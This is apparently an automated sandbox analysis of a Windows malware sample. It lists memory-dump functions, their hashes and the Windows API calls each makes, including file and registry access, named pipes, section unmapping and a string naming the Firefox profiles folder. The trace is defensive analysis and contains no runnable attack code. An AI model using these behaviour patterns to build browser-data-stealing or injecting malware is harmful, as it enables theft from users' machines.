  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32B25, Relevance: 10.6, APIs: 7, Instructions: 98 Total matches: 51file
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
